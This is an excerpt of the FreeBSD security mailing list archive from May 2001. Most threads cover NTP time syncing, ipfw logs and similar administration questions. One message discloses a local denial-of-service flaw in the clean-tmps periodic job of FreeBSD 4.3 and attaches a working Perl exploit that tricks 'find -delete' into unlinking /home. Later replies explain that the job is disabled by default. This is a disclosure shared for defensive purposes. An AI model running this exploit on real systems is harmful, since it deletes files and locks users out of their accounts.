l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 13: 9:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id B163F37B424 for ; Thu, 24 May 2001 13:09:24 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 9C9CDBA40; Thu, 24 May 2001 15:09:20 -0500 (CDT) Message-ID: <00a401c0e48d$32db04f0$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Hank Wethington" , "Dominic Marks" Cc: References: Subject: Re: setting time without changing securelevel Date: Thu, 24 May 2001 15:07:44 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A cron job using ntpdate actually changes your time. Which may not be good for data going into a database, especially data keyed off of the time. ntpd will adjust the speed of your system clock so that it slows down or speeds up to match the "network" clock. This is friendly to database activity. I don't see why I would need a hardware extension to keep time accurate. Accurate time is not that much of an issue (a minute or two is OK with me), but I do want all my machines synced. Also, I don't expose the time daemon to the outside world, so the exploit is only local, and my users are trusted. FreeBSD doesn't actually use xntpd, it migrated over (back?) to ntp some time back. I think the xntpd knob should probably be changed. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Hank Wethington" To: "Thomas T. Veldhouse" ; "Dominic Marks" Cc: Sent: Thursday, May 24, 2001 2:39 PM Subject: RE: setting time without changing securelevel > An issue you might have to look into would be the fact that there is a > exploit for ntpd that does extend to xntpd. If your just getting time > periodically and not having to be a server for the rest of the network, then > a cron job for using ntpdate would probably be a better way to go. If you do > need it for network time serving, you might be better off getting a GPS > setup to give ntp the time over a serial connection. > > Hank Wethington > Information Logistics > > ================================================ > www.GoInfoLogistics.com > mailto:info@GoInfoLogistics.com > ================================================ > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. > Veldhouse > Sent: Thursday, May 24, 2001 12:32 PM > To: Dominic Marks > Cc: freebsd-security@freebsd.org > Subject: Re: setting time without changing securelevel > > > I found a similar article myself (I don't remember the URL though). I have > had it running for quite some time (well -- a week or so). I didn't see > that it recommends you use more than one server to sychronize with. I am > currently using 4 public servers. > > That looks like a pretty decent article. It, like the rest, fail to inform > you how to run your new server as a time server for the rest of your > network. I can ntptrace ot it on the local machine, but it won't respond to > other clients on my LAN. > > Tom Veldhouse > veldy@veldy.net > > > ----- Original Message ----- > From: "Dominic Marks" > To: "Thomas T. Veldhouse" > Cc: > Sent: Thursday, May 24, 2001 2:25 PM > Subject: Re: setting time without changing securelevel > > Hello, > > On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > > knob). It is not hard to setup, but the documentation [that is readable] > is > > scarce. > > > > Tom Veldhouse > > veldy@veldy.net > > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. > > -- > Dominic Marks > > Don't talk to me about Naval tradition. > It's nothing but rum, sodomy and the lash." > -- Winston Churchill > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 15:40:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts13-srv.bellnexxia.net (tomts13.bellnexxia.net [209.226.175.34]) by hub.freebsd.org (Postfix) with ESMTP id BFE9D37B422 for ; Thu, 24 May 2001 15:39:57 -0700 (PDT) (envelope-from glassfish@glassfish.net) Received: from frogbox.glassfish.net ([64.230.29.112]) by tomts13-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20010524223956.NSFI25498.tomts13-srv.bellnexxia.net@frogbox.glassfish.net> for ; Thu, 24 May 2001 18:39:56 -0400 Received: (qmail 25048 invoked from network); 24 May 2001 22:42:56 -0000 Received: from unknown (HELO MAINWS) (192.0.0.20) by 192.0.0.4 with SMTP; 24 May 2001 22:42:56 -0000 From: "Michael Tang Helmeste" To: Subject: RE: setting time without changing securelevel Date: Thu, 24 May 2001 18:39:02 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <00a401c0e48d$32db04f0$3028680a@tgt.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ah.. well I run an IRC server that uses the time to determine what to do in netsplits. If the time goes off, all the servers split off. Thanks for all the feedback people, I'll look into NTP :) -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. Veldhouse Sent: Thursday, May 24, 2001 4:08 PM To: Hank Wethington; Dominic Marks Cc: freebsd-security@freebsd.org Subject: Re: setting time without changing securelevel A cron job using ntpdate actually changes your time. Which may not be good for data going into a database, especially data keyed off of the time. ntpd will adjust the speed of your system clock so that it slows down or speeds up to match the "network" clock. This is friendly to database activity. I don't see why I would need a hardware extension to keep time accurate. Accurate time is not that much of an issue (a minute or two is OK with me), but I do want all my machines synced. Also, I don't expose the time daemon to the outside world, so the exploit is only local, and my users are trusted. FreeBSD doesn't actually use xntpd, it migrated over (back?) to ntp some time back. I think the xntpd knob should probably be changed. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Hank Wethington" To: "Thomas T. Veldhouse" ; "Dominic Marks" Cc: Sent: Thursday, May 24, 2001 2:39 PM Subject: RE: setting time without changing securelevel > An issue you might have to look into would be the fact that there is a > exploit for ntpd that does extend to xntpd. If your just getting time > periodically and not having to be a server for the rest of the network, then > a cron job for using ntpdate would probably be a better way to go. If you do > need it for network time serving, you might be better off getting a GPS > setup to give ntp the time over a serial connection. > > Hank Wethington > Information Logistics > > ================================================ > www.GoInfoLogistics.com > mailto:info@GoInfoLogistics.com > ================================================ > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. > Veldhouse > Sent: Thursday, May 24, 2001 12:32 PM > To: Dominic Marks > Cc: freebsd-security@freebsd.org > Subject: Re: setting time without changing securelevel > > > I found a similar article myself (I don't remember the URL though). I have > had it running for quite some time (well -- a week or so). I didn't see > that it recommends you use more than one server to sychronize with. I am > currently using 4 public servers. > > That looks like a pretty decent article. It, like the rest, fail to inform > you how to run your new server as a time server for the rest of your > network. I can ntptrace ot it on the local machine, but it won't respond to > other clients on my LAN. > > Tom Veldhouse > veldy@veldy.net > > > ----- Original Message ----- > From: "Dominic Marks" > To: "Thomas T. Veldhouse" > Cc: > Sent: Thursday, May 24, 2001 2:25 PM > Subject: Re: setting time without changing securelevel > > Hello, > > On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > > knob). It is not hard to setup, but the documentation [that is readable] > is > > scarce. > > > > Tom Veldhouse > > veldy@veldy.net > > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. > > -- > Dominic Marks > > Don't talk to me about Naval tradition. > It's nothing but rum, sodomy and the lash." > -- Winston Churchill > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 16:22:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id F421E37B423 for ; Thu, 24 May 2001 16:22:10 -0700 (PDT) (envelope-from rich@rdrose.org) Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id AAA19936 for ; Fri, 25 May 2001 00:22:10 +0100 Date: Fri, 25 May 2001 00:22:10 +0100 (BST) From: rich@rdrose.org X-Sender: rik@pkl.net To: security@freebsd.org Subject: Apologies... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Okay, maybe I should have been on the list (or mentioned that I wasn't it). I'm on the list now... The patch that I made, WHICH NEEDS DEBUGGING (still) can now be found at: http://rikrose.net/patch-more-security. rik To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 17:26: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from rgmail.regenstrief.org (rgmail.regenstrief.org [134.68.31.197]) by hub.freebsd.org (Postfix) with ESMTP id B761C37B422 for ; Thu, 24 May 2001 17:25:59 -0700 (PDT) (envelope-from gunther@aurora.regenstrief.org) Received: from aurora.regenstrief.org (rgnout.regenstrief.org [134.68.31.38]) by rgmail.regenstrief.org (8.11.0/8.8.7) with ESMTP id f4P0SiX08158; Thu, 24 May 2001 19:28:44 -0500 Message-ID: <3B0DA693.9A424222@aurora.regenstrief.org> Date: Fri, 25 May 2001 00:25:55 +0000 From: Gunther Schadow Organization: Regenstrief Institute for Health Care X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: alexus Cc: Bill Mitcheson , freebsd-security@FreeBSD.ORG Subject: Re: ipfw problems. References: <3B0C3130.11D3DCBA@pyramus.com> <000b01c0e3de$5ce01c90$01000001@book> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org alexus wrote: > > show us your /etc/rc.conf file and don't forget the rc.firewall file too :-) -Gunther -- Gunther Schadow, M.D., Ph.D. gschadow@regenstrief.org Medical Information Scientist Regenstrief Institute for Health Care Adjunct Assistent Professor Indiana University School of Medicine tel:1(317)630-7960 http://aurora.regenstrief.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 21:15: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 2DCE637B422 for ; Thu, 24 May 2001 21:14:56 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 48953 invoked from network); 25 May 2001 04:17:58 -0000 Received: from localhost (HELO alexus) (root@127.0.0.1) by localhost with SMTP; 25 May 2001 04:17:58 -0000 Message-ID: <001d01c0e4d1$79dcb8a0$0100a8c0@alexus> From: "alexus" To: "Gunther Schadow" Cc: "Bill Mitcheson" , References: <3B0C3130.11D3DCBA@pyramus.com> <000b01c0e3de$5ce01c90$01000001@book> <3B0DA693.9A424222@aurora.regenstrief.org> Subject: Re: ipfw problems. Date: Fri, 25 May 2001 00:16:29 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm pretty much sure that he just didn't enable firewall.. so there will be no need for rc.firewall;) but we shall see;) ----- Original Message ----- From: "Gunther Schadow" To: "alexus" Cc: "Bill Mitcheson" ; Sent: Thursday, May 24, 2001 8:25 PM Subject: Re: ipfw problems. > alexus wrote: > > > > show us your /etc/rc.conf file > > and don't forget the rc.firewall file too :-) > > -Gunther > > -- > Gunther Schadow, M.D., Ph.D. gschadow@regenstrief.org > Medical Information Scientist Regenstrief Institute for Health Care > Adjunct Assistent Professor Indiana University School of Medicine > tel:1(317)630-7960 http://aurora.regenstrief.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 1:42:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 7CF7C37B422 for ; Fri, 25 May 2001 01:42:46 -0700 (PDT) (envelope-from sheldonh@uunet.co.za) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 153DBC-0001pR-00; Fri, 25 May 2001 10:42:42 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id KAA01100; Fri, 25 May 2001 10:42:40 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 951; Fri May 25 10:42:04 2001 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.22 #1) id 153DAa-000KhW-00; Fri, 25 May 2001 10:42:04 +0200 To: Dominic Marks Cc: "Thomas T. Veldhouse" , freebsd-security@freebsd.org Subject: Re: setting time without changing securelevel In-reply-to: Your message of "Thu, 24 May 2001 20:25:06 +0100." <20010524202506.B466@apollo> Date: Fri, 25 May 2001 10:42:04 +0200 Message-ID: <79577.990780124@axl.fw.uunet.co.za> From: Sheldon Hearn Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 24 May 2001 20:25:06 +0100, Dominic Marks wrote: > I suggest: http://freebsddiary.org/xntpd.html > > One problem I had was having to create an /etc/localtime as there > wasn't one on the machine to begin with. Symlinking it to my city > in /usr/share/zoneinfo/etc/etc works great in combination with the > processes described in the above article. It's even easier than that. Use the tzsetup(8) utility. The diary article should mention it. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 7:25:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from oblr.sm.energy.gov.ua (soe.sumy.net [194.153.148.73]) by hub.freebsd.org (Postfix) with ESMTP id 3AA6F37B422 for ; Fri, 25 May 2001 07:25:49 -0700 (PDT) (envelope-from anv@smenergy.com.ua) Received: from obl3r.sm.energy.gov.ua (obl3r.sm.energy.gov.ua [10.109.1.1]) by oblr.sm.energy.gov.ua (Sendmail 8.who.cares/1) with ESMTP id RAA16580 for ; Fri, 25 May 2001 17:25:43 +0300 (EEST) Received: from anv (anv.sm.energy.gov.ua [10.109.1.39]) by obl3r.sm.energy.gov.ua (8.8.8/8.8.5) with SMTP id RAA21486 for ; Fri, 25 May 2001 17:25:21 +0300 (EEST) Message-ID: <000b01c0e526$94f3d6a0$27016d0a@sm.energy.gov.ua> From: "Andrey Nebogin" To: Subject: help Date: Fri, 25 May 2001 17:25:21 +0300 MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org help list To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10: 3:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost1.dircon.co.uk (mailhost1.dircon.co.uk [194.112.32.65]) by hub.freebsd.org (Postfix) with ESMTP id 64E8C37B423 for ; Fri, 25 May 2001 10:03:33 -0700 (PDT) (envelope-from nick@cleaton.net) Received: from laptop (desk77.ch.dircon.net [195.157.3.77]) by mailhost1.dircon.co.uk (8.9.3/8.9.3) with ESMTP id SAA80671 for ; Fri, 25 May 2001 18:03:32 +0100 (BST) Received: (from nick@localhost) by laptop (8.9.3/8.9.3) id SAA00526 for security@freebsd.org; Fri, 25 May 2001 18:03:54 +0100 Date: Fri, 25 May 2001 18:03:54 +0100 From: Nick Cleaton To: security@freebsd.org Subject: 4.3 Security: local DoS via clean-tmps Message-ID: <20010525180354.A434@lt1.cleaton.net> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="VbJkn9YxBvnuCH5J" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Tested in 4.3-RELEASE only: If /etc/periodic/daily/clean-tmps is enabled, then it's possible for any local user to trick it into calling unlink() or rmdir() on anything in the root directory. The problem is that "find -delete" can be made to do chdir("..") multiple times followed by unlink() and/or rmdir(). 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL chdir(0x280e227d) 588 find NAMI ".." 588 find RET chdir 0 588 find CALL unlink(0x8051440) 588 find NAMI "sys" This means it can be tricked into going up too high by moving its current directory higher up the hierarchy, by for example doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is somewhere under "/tmp/1/2/3". The attached exploit will cause it to delete the /home -> /usr/home symlink. I think this would render it impossible to log into a system configured for non-root ssh access via DSA key only. This could also be used to unlink other users' files in /tmp without regard to their age. -- Nick Cleaton nick@cleaton.net --VbJkn9YxBvnuCH5J Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=ditch #!/usr/bin/perl5 -w use strict; # The thing in / that we want to unlink. my $target = 'home'; ###################################################### use Fatal qw(mkdir chdir open utime rename link); chdir '/tmp'; mkdir 'x47', 0755; chdir 'x47'; mkdir 'foo', 0755; oldfile($target); chdir 'foo'; mkdir 'bar', 0755; chdir 'bar'; mkdir 'tree', 0755; chdir 'tree'; oldfile('trigger'); mkdir 'big', 0755; # build something that will take a while to tear down chdir 'big'; for my $f (1..50) { oldfile($f); for my $l (1..100) { link $f, "$f.$l"; } } chdir '..'; print "waiting for the cron job...\n"; fork and exit; while (-r 'trigger') { select undef, undef, undef, 0.1; } rename '/tmp/x47/foo/bar/tree', '/tmp/x48'; sub oldfile { my $file = shift; open OUT, ">$file"; utime 0, 0, $file; } --VbJkn9YxBvnuCH5J-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10:44: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 0F00537B422 for ; Fri, 25 May 2001 10:44:02 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 8887 invoked from network); 25 May 2001 17:47:07 -0000 Received: from localhost (HELO book) (root@127.0.0.1) by localhost with SMTP; 25 May 2001 17:47:07 -0000 Message-ID: <001301c0e542$474fd3b0$01000001@book> From: "alexus" To: "Nick Cleaton" , References: <20010525180354.A434@lt1.cleaton.net> Subject: Re: 4.3 Security: local DoS via clean-tmps Date: Fri, 25 May 2001 13:43:59 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org how can i make sure that i dont have this enabled? and if there a fix for that? ----- Original Message ----- From: "Nick Cleaton" To: Sent: Friday, May 25, 2001 1:03 PM Subject: 4.3 Security: local DoS via clean-tmps > > Tested in 4.3-RELEASE only: > > If /etc/periodic/daily/clean-tmps is enabled, then it's possible > for any local user to trick it into calling unlink() or rmdir() > on anything in the root directory. > > The problem is that "find -delete" can be made to do chdir("..") > multiple times followed by unlink() and/or rmdir(). > > 588 find CALL chdir(0x280e227d) > 588 find NAMI ".." > 588 find RET chdir 0 > 588 find CALL chdir(0x280e227d) > 588 find NAMI ".." > 588 find RET chdir 0 > 588 find CALL chdir(0x280e227d) > 588 find NAMI ".." > 588 find RET chdir 0 > 588 find CALL chdir(0x280e227d) > 588 find NAMI ".." > 588 find RET chdir 0 > 588 find CALL unlink(0x8051440) > 588 find NAMI "sys" > > This means it can be tricked into going up too high by moving > its current directory higher up the hierarchy, by for example > doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is > somewhere under "/tmp/1/2/3". > > The attached exploit will cause it to delete the /home -> /usr/home > symlink. I think this would render it impossible to log into a > system configured for non-root ssh access via DSA key only. > > This could also be used to unlink other users' files in /tmp > without regard to their age. > > -- > Nick Cleaton > nick@cleaton.net > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10:53:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 5DE1E37B423 for ; Fri, 25 May 2001 10:53:41 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f4PHrMG62258; Fri, 25 May 2001 13:53:22 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 25 May 2001 13:53:17 -0400 (EDT) From: Rob Simmons To: alexus Cc: Nick Cleaton , security@FreeBSD.ORG Subject: Re: 4.3 Security: local DoS via clean-tmps In-Reply-To: <001301c0e542$474fd3b0$01000001@book> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 That is off by default in FreeBSD. You would have had to add a line like this to /etc/periodic.conf daily_clean_tmps_enable="YES" The line in /etc/defaults/periodic.conf is: daily_clean_tmps_enable="NO" Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 25 May 2001, alexus wrote: > how can i make sure that i dont have this enabled? and if there a fix for > that? > > ----- Original Message ----- > From: "Nick Cleaton" > To: > Sent: Friday, May 25, 2001 1:03 PM > Subject: 4.3 Security: local DoS via clean-tmps > > > > > > Tested in 4.3-RELEASE only: > > > > If /etc/periodic/daily/clean-tmps is enabled, then it's possible > > for any local user to trick it into calling unlink() or rmdir() > > on anything in the root directory. > > > > The problem is that "find -delete" can be made to do chdir("..") > > multiple times followed by unlink() and/or rmdir(). > > > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL chdir(0x280e227d) > > 588 find NAMI ".." > > 588 find RET chdir 0 > > 588 find CALL unlink(0x8051440) > > 588 find NAMI "sys" > > > > This means it can be tricked into going up too high by moving > > its current directory higher up the hierarchy, by for example > > doing "mv /tmp/1/2/3 /tmp/4" while find's working directory is > > somewhere under "/tmp/1/2/3". > > > > The attached exploit will cause it to delete the /home -> /usr/home > > symlink. I think this would render it impossible to log into a > > system configured for non-root ssh access via DSA key only. > > > > This could also be used to unlink other users' files in /tmp > > without regard to their age. > > > > -- > > Nick Cleaton > > nick@cleaton.net > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DpwSv8Bofna59hYRA3aIAJ40bgRrqBeUU/KwCEWoyECin3rNIQCfeWig 3NZrJFVotoNfWFaMlUdTckA= =+kjL -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 10:56:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from kottan-labs.bgsu.edu (kottan-labs.bgsu.edu [129.1.148.220]) by hub.freebsd.org (Postfix) with SMTP id A854E37B424 for ; Fri, 25 May 2001 10:56:28 -0700 (PDT) (envelope-from memphis_ms@gmx.net) Received: (qmail 4356 invoked from network); 25 May 2001 13:58:51 -0400 Received: from raoul.bgsu.edu (HELO gmx.net) (129.1.148.16) by kottan-labs.bgsu.edu with RC4-MD5 encrypted SMTP; 25 May 2001 13:58:51 -0400 Message-ID: <3B0E9DA1.EC44089A@gmx.net> Date: Fri, 25 May 2001 14:00:01 -0400 From: Raoul Schroeder X-Mailer: Mozilla 4.74 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD Security Subject: denied P:2 packets Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I am sorry if this question has already been discussed ad infinitum... My ipfw logs logged a denied P:2 packet. What kind of protocol is P:2 ? Is this something to worry about? Thanks, Raoul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11: 6:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mica.sentex.ca (mica.sentex.ca [206.222.77.5]) by hub.freebsd.org (Postfix) with ESMTP id D223937B422 for ; Fri, 25 May 2001 11:06:29 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by mica.sentex.ca (8.9.3/8.9.3) with ESMTP id OAA72766; Fri, 25 May 2001 14:06:21 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010525135953.04a6e8e0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 25 May 2001 14:00:47 -0400 To: Raoul Schroeder , FreeBSD Security From: Mike Tancsa Subject: Re: denied P:2 packets In-Reply-To: <3B0E9DA1.EC44089A@gmx.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The file /etc/protocols contains a list of.... protocols ;-) igmp 2 IGMP # internet group management protocol At 02:00 PM 5/25/01 -0400, Raoul Schroeder wrote: >Hello, > >I am sorry if this question has already been discussed ad infinitum... > >My ipfw logs logged a denied P:2 packet. What kind of protocol is P:2 ? >Is this something to worry about? > >Thanks, > >Raoul > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 25 11: 8:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from napanet.net (daffy.napanet.net [206.81.96.18]) by hub.freebsd.org (Postfix) with ESMTP id 4165237B422 for ; Fri, 25 May 2001 11:08:48 -0700 (PDT) (envelope-from steve@napanet.net) Received: from sb (dialup-116.oakland.ca.interx.net [209.209.29.116]) by napanet.net (8.11.3/8.11.2) with SMTP id f4PI8T887275; Fri, 25 May 2001 11:08:33 -0700 (PDT) From: "Steve Brown" To: "Thomas T. Veldhouse" , "Michael Tang Helmeste" , Subject: RE: Qmail + FreeBSD 4.3 Date: Fri, 25 May 2001 11:08:30 -0700 Message-ID: <027f01c0e545$b4407080$3da2169d@napanet.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, 